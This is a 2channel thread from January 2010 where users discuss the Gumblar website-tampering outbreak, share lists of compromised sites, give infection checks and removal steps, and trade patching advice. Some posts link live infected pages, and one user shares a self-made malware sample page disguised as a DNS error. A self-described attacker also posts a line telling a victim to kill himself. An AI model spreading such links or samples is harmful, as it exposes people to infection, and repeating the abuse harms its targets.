ttp://internet.watch.impress.co.jp/docs/news/20100108_341267.html
727 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:53:01 ]: 来週の話でしょ。
対応遅すぎ。
728 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:54:32 ]: なんでそんな悠長に構えてんだろうなアドビ
自分とこの製品が犯罪に利用されてるってのに
729 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:56:43 ]: AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
730 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:57:04 ]: 競合相手がいないからさ
731 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:59:09 ]: >>720
感染しているPCはCPU使用率が異常に高いのも目安のひとつだな
732 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 17:59:23 ]: サイト改ざんリスト（発表分のみ）
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113

三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西

しかし、とんでもねー数だな…
733 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:02:14 ]: adobeもアレだけど感染した企業のセキュリティに対する認識の甘さも問題だな
734 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:02:32 ]: 猛威をふるうガンブラーの徹底対策術
www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm?from=navlk
735 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:02:43 ]: /*LGPL*/
www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262939972
対応済み：Avira　カスペ　NOD32
736 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 18:02:49 ]: CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
737 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:04:25 ]: >>732
ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね？
今回のは自分が感染してるかどうか分からないみたいだし…
738 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:05:29 ]: >>732
ネズミーもか！？
閲覧者多そうだしますますやばいな
739 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:09:37 ]: >>721
一応他スレから転載

437 ：8080：2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435
旧Gumblarのやつは使えない。

【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタートメニュー\プログラム\siszyd32.exe
ファイルを削除

＊感染していた場合＊
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。
740 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:09:37 ]: >>732
ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう
741 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:10:19 ]: >>737-738
リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。

まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。
742 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:11:01 ]: >>740
リンク先に詳しく書いてある。
743 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:14:29 ]: >>742
Forbiddenってなる
744 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:15:51 ]: >>732

＞■検索エンジンMooter（2009年12月30日発表）
＞種別：/*GNU GPL*/
＞期間：2009年12月25日1時～12月28日18時30分
＞場所：Mooterホームページ（*.mooter.co.jp）、および「Mooter検索窓」の設置サイト
＞告知：弊社ホームページの改ざんについてのお詫びとお知らせ（削除済み）

こことか地味に酷くね？
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。
745 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:15:55 ]: >>743
は？
746 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:16:52 ]: ■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時～12月25日18時
場所：ショッピングサイトお正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
www.disney.co.jp/shopping/pop/091229_info.html

しょうがないやつだ。念のためおまえのPCはクリーンインストールして来い
747 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:17:40 ]: >>743

＞■ディズニー（2009年12月29日発表）
＞種別：Gumblar.x
＞期間2009年12月22日16時～12月25日18時
＞場所：ショッピングサイトお正月特集ページ（www.disney.co.jp●shopping/special/0912_newyear.html）
＞告知：お正月特集ページに関するお詫び
＞www.disney.co.jp●shopping/pop/091229_info.html
748 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:18:27 ]: >>743
■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時～12月25日18時
場所：ショッピングサイトお正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
749 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:19:16 ]: >>735
>>592 を再スキャンしてみた
定義データでは一部のスクリプトだけの検出だな・・・
本格的な対応はこれからか

結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262941360
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262941441
結果: 1/41 (Sophos)
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262941513
750 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:20:54 ]: でもまぁ、
(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応
751 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:21:11 ]: >>746-748
わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ
752 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:23:48 ]: New谷さん大丈夫かね

748 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2010/01/08(金) 18:18:27
>>743
■ディズニー（2009年12月29日発表）
種別：Gumblar.x
期間2009年12月22日16時～12月25日18時
場所：ショッピングサイトお正月特集ページ（www.disney.co.jp/shopping/special/0912_newyear.html）
告知：お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
753 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:24:12 ]: >>750
pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO（Gumblar）ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)～(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す
754 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:25:05 ]: もともとスクリプトを検出していたのは少ない
win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ
脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能
755 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:26:28 ]: >>739の感染確認方法ってどうなの？
756 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:27:45 ]: 現時点じゃ他に確認のしようがない
757 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:28:11 ]: 「New谷さん」呼びはやめろよな
758 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:30:20 ]: >>755
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう
759 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:34:06 ]: >>758
詳しくありがとうございます
760 名前：752 mailto:sage [2010/01/08(金) 18:37:49 ]: ごめん誤爆だった
761 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:40:31 ]: このあいだfirefox NoScript＋view-source:で
感染サイトのソース見ようとしたらavast!がプゥプゥいった。
この状況でも感染するもの？
adobeのjavaはオフにしてある。
762 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:40:40 ]: 糸色望した
763 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 18:42:29 ]: >>761
その場合はNoScriptでブロックされているはず
問題ない

＞adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物
764 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:48:29 ]: view-sourceだけでも安全な気がしてたんだが・・・
違うのね
765 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:49:05 ]: 安全だよ
766 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:49:37 ]: txtとして開くんだから大丈夫じゃないの？
767 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:52:52 ]: txt形式でもウイルスのコード記述があれば反応するのでは
感染はしないけど
768 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:52:58 ]: >>763ありがとう
ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる
769 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:54:52 ]: オンラインソースチェッカーの代わりに
www.aguse.jp/
じゃだめなのか？
770 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:55:57 ]: >>768
見れると思うけど
>>550
ttp://www.aguse.jp/
771 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:57:21 ]: 初心者で申し訳ないんだけど、>>753の（1）～（4）に加えて
IEでセキュリティ高にしたり、firefox＋NoScript使えばさらに安全になるのかな？
772 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:57:43 ]: >>710
モロゾフの人がＦＴＰログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね

モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です

＞モロゾフの人
首吊って氏んだ方がいいとおもいますよ
773 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 18:58:48 ]: ttp://www.aguse.jp/
ってソースどこに表示されるの？
ホストだとかドメインだとかは出てくるんだけど
774 名前：772EM114-48-42-165.pool.e-mobile.ne.jp mailto:sage [2010/01/08(金) 19:01:01 ]: ＞モロゾフの人
文句があったらかかってきなさい

-o_japan-ｵﾙﾃｨｽｼﾞｬﾊﾟﾝｰ
775 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:02:20 ]: >>773
調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます
776 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:02:22 ]: 飛び先チェック
kakiko.com/check/sample.html
777 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:03:23 ]: 更新するものは最新版に更新して、
Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール
Adobe Readerなんて他の無料で軽いの使えばいいんだし
これが一番の防御策だね
778 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:03:30 ]: >>775
ゴメンこれはサイトを見たいときね
779 名前：sage ◆sage/xLnlI [2010/01/08(金) 19:09:32 ]: >>702
検体（コードが書いてあるやつ）いるならあげる
うｐできるかわからないけど
780 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:09:48 ]: >>776
これ知らなかった
ありがとう
781 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:12:39 ]: ドクター中松さんのサイトは修正済みみたいだね
782 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:17:18 ]: >>159
ここはまだだね
いつの間にかLGPLに変わってるし
783 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:18:42 ]: >>738
なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
＞ネズミー
784 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:19:11 ]: >>782
どういう人かと思って検索したら驚いた
785 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:20:42 ]: >>783
いちいち言わなくて良いよ
786 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:21:01 ]: >>782
LGPLだね
元がどうだったか知らないけど
787 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:37:29 ]: このブラウザ使えるかもしれん
ttp://www.scriptbrowserk.com/

コンテンツブロックに*:8080/*を放り込ｍ(ry
788 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 19:45:43 ]: 「GNU(ぐぬー)たん」
お馴染みのヌーを萌擬人化したキャラ

誰か・・・描いて・・・
789 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 19:50:47 ]: >>773
右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
ttp://gw.aguse.jp/
逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。
790 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:12:15 ]: ノートンは対応してないのか・・・
>>739の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでＦＡ？
感染してないと思うけど気になるので
791 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:13:10 ]: 朝刊の一面になるほどのニュースなのに
対策していない企業とかマジでありえない
対策していないネットユーザにも責任はあるが
そのままWEBサイトを放置している企業の責任は重大
792 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:19:08 ]: >>790
ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する
793 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:21:30 ]: >>159
こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・

フラッシュのバージョンが10.0.42.34だと影響ないということ？
794 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:22:27 ]: >>792
ありがとう、少し安心した
795 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:23:21 ]: >>793
Flashは関係ない
796 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:24:43 ]: >>794
感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認
797 名前：790 mailto:sage [2010/01/08(金) 20:31:54 ]: >>796
タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう
798 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 20:35:03 BE:1098795874-2BP(7777)]: >>797
早い話
オンラインスキャン汁
799 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:37:35 ]: オンラインスキャンしたところで検出できるやつがなかったりするからな
800 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 20:41:04 ]: >>799
オワタ＼(＾o＾)／

今でも（´・ω・）ｽｸﾘﾌﾟﾄが埋め込まれているうｒｌｐｌｚ
801 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 20:51:06 ]: Quick Time ですけど、QuickTime Alternativeはどうなんでしょ？入れて置いてもいいの？
アホな質問しているのかしら…。
802 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:02:06 ]: >>783
TDLのガイドライン・・・
803 名前：sage ◆sage/xLnlI [2010/01/08(金) 21:08:21 ]: >>800
おｋ
うpしてくる（自分のサイトに）
804 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:13:00 ]: >>803
お前はさっきから何がしたいんだ？
805 名前：sage ◆sage/xLnlI [2010/01/08(金) 21:13:40 ]: www16.atpages.jｐ/filedl/dnserror.html

検体的なもの（アクセスすると危険）
806 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 21:18:10 ]: >>805
エラーにみせかけるとな？
鬼畜ですな
807 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:27:28 ]: >>805
/*GNU GPL*/
808 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:33:55 ]: >>805
カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード
809 名前：ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI [2010/01/08(金) 21:41:15 ]: >>808
それやばい
810 名前：ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI [2010/01/08(金) 21:43:09 ]: >>806
エラー画面をみて思いつきましたw
811 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:45:22 ]: まいど。
ttp://www.okamoto.co.jp/
KIS2010で検出。
812 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 21:47:22 ]: 新ウイルスに対応したオンラインスキャナーないのかよ・・・
アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・
813 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:51:26 ]: >>811

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

>>811

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010
814 名前：ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI [2010/01/08(金) 21:52:22 ]: >>812
なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)

upの仕方

コードを書いてtxtに
↓
up
↓
txtをhtmlに書き換え

ヽ('A`)ﾉ　完成!
　(　 )
　ﾉω|
815 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:53:47 ]: 感染の有無をチェックする無料のオンラインスキャンサービス

www.trendflexsecurity.jp/housecall/index.html?WT.ac=JPclusty_onlinescan
security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym
816 名前：ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI [2010/01/08(金) 21:54:29 ]: >>811
なにも起こらない　　当たり前だけど
(pspで2ch北から)
817 名前：ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI [2010/01/08(金) 21:56:13 ]: 検体upは仮装pcから←オヌヌメ
818 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 21:57:26 ]: >>817
最近のウイルスはホストOSまで影響を与えるらしいよ（そよっ
819 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 21:58:57 ]: 仮想PCだから安心なんてのは幻想にすぎんよ
820 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:07:53 ]: >>811
こういうのは2chブラウザビューアで見ても感染しない？
821 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:09:11 ]: >>820
winマシンで見る限り絶対安心とは言えない
822 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:10:08 ]: >>817
押入れから古いPC(HDD無)引っ張り出して
KNOPPIX(DVD)＋USBメモリマウント
823 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 22:12:44 ]: www.copper-brass.gr.jp/

日本伸銅協会
824 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:14:12 ]: >>777
Adobe互換ソフトも必ずしも安全ではないと何度言えば
825 名前：sage ◆sage/xLnlI [2010/01/08(金) 22:14:12 ]: >>818
(　ﾟдﾟ)

(つд⊂)ｺﾞｼｺﾞｼ

(；ﾟдﾟ)

(つд⊂)ｺﾞｼｺﾞｼ
　　_, ._
（；ﾟ Дﾟ） …？!

( ﾟдﾟ )フラグビンビン[ﾋﾟｰ]ビンビン
826 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:15:46 ]: >>812
まずはOSの入れなおしからどうぞ
827 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:17:09 ]: もうこうなると、まだ無事なサイト上げた方が早い気すらしてくる
828 名前：sage ◆sage/xLnlI [2010/01/08(金) 22:18:14 ]: ホストpcスペック
OS windows7
メモリー　4GB
CPU AMD　アスロン64X2 2.7GHz
ADOBE 8.12
flash　最新
JRE ? 12
829 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:20:24 ]: 他はともかく、JREはアンインスコしとけば他のウィルス対策にもなるから
アンインスコしない手はない
830 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 22:20:41 ]: >>826
ウイルス踏んでもいないのにクリーンインストールかよ・・・
アレなんだよ・・・NICのドライバと競合して入れられない俺のマシン
アンチウイルスと犬猿の仲・・・
831 名前：sage ◆sage/xLnlI [2010/01/08(金) 22:43:00 ]: >>829
俺はJREがないと2chが見れませんので無理でつ
832 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:54:18 ]: >>830
ドライバソフトの更新ないの？
833 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 22:58:13 ]: >>832
最近更新されていないお・・・
バージョンを色々と変えてみたが・・・ムリポ
834 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 22:59:21 ]: >>823
あれ、教えてもずっと放置してたのにいつの間にかサーバ落としたのか
835 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:02:57 ]: >>834
ここ見てたんですかねぇ。。。
836 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 23:10:45 ]: ウイルスに感染できるうｒｌｐｌｚ
837 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:26:13 ]: >>717
ケータイに感染するウィルスなかったっけ
838 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:31:36 ]: 「日本伸銅協会」をヤフで検索、キャッシュのソース内にしっかりと/*GNU GPL*/がｗｗｗ
839 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:42:19 ]: www.okamoto.co●jp/js/over.js

/*LGPL*/ ですね
840 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 23:53:34 ]: 危ないURLを踏んでみたが感染しなかったｗｗｗ
俺最強
841 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:54:37 ]: 『蜂の家』でググって一番上のサイトはまだ感染してるのかな
842 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:58:01 ]: このウイルスって２度目のアクセスは感染させるためのページ表示させない仕様なのかな？
843 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 23:58:46 ]: アプリケーションの追加と削除にJAVAの旧バージョンが10個位あったんだけど影響とかあるの？
844 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:01:55 ]: javaなんてほとんど使い道ないから全部消した方が安心
845 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:04:34 ]: お絵かきチャットできなくなっちゃう！＞＜
846 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 00:05:04 ]: 今日の会社のお年寄りの会話
おっさんA「ガンプラって怖いらいな、ＨＰ見ただけで・・・」
おっさんB「ブログ見ただけでも感染するって書いてあるぞ・・・」

もれ心の中で「それ、ガンプラじゃなくてガンブラーだから・・・
　　　　　　　しかも、仕事中にどんなところ覗いているんだよ・・・おっさんども。」
847 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:11:23 ]: Java消したらEclipse使えないじゃん
848 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 00:12:14 ]: 誰かウイルス本体を上げてくれ
ttp://ux.getuploader.com/virus/
849 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 00:23:37 ]: >>744
鳩山首相のtwitter偽アカウントやってたメガネ王という人のブログにmooterのブログパーツがあって、
年末ちょっと騒動になった
850 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:45:47 ]: インターネットに公開してる企業のサイトは、
セキュリティのきっちりしたデータセンターに鯖が置いてあって、
更新時なんかは許可された端末からのみVPN経由でできるよう
にしてあるのが常識だと思ってたんだけど、意外とみんなそうじゃないんだね・・・
851 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:55:48 ]: そんなところはほとんどないだろ
852 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 00:57:53 ]: 社内セキュリティ＞サイト
853 名前：名無しさん＠お腹いっぱい。 [2010/01/09(土) 01:22:32 ]: >>850
それやってもやられるものはやられる
854 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 01:32:40 ]: >>847
そうそう
JREのバージョンを上げるって対策だけはおいそれと出来ないから困ってる
855 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 01:35:38 ]: >>854
色々不具合が起きるケースが多いわな、確かに。
856 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 01:36:43 ]: わかります、戸松遥，中島愛，早見沙織なわけですね
857 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 02:00:56 ]: 変則的だけど、インストーラは別だからシステムに影響するJREは最新にして
JDK側は開発に合わせるとかもできなくもない気がする
試してないけどね

お絵かきしたい人は諦めてくれ
858 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 02:09:23 ]: Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt

インシデントの届出
ttps://form.jpcert.or.jp/

記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
結構適当でいいらしい。
859 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 02:44:26 ]: >>844
JAVAのバージョンチェックしたらJAVAそのものが入っていなかったでござる
860 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 03:01:00 ]: 噴いたｗｗｗ
861 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 03:02:43 ]: >>859
あれ？　俺書いたっけ・・・
とりあえずＪＡＶＡ入れてきたｗ
862 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 03:03:16 ]: >>732見たけど
■三栄コーポレーション（2010年1月8日発表）
告知：「モッフル」ホームページの改ざんとウイルス被害に関する報告とお詫び[PDF]

いま出すお詫びがPDFでなくてもよかろうもん
863 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 03:25:32 ]: >>861
なかったもんをなぜわざわざ入れるのだ
864 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/09(土) 03:54:58 ]: サイバー／サーバー／サバイバー(なんかキワモノバンドの名前になりそうな)

　しかしネットサーフィンも電脳サバイバルの様相を呈してきた感じ・・・
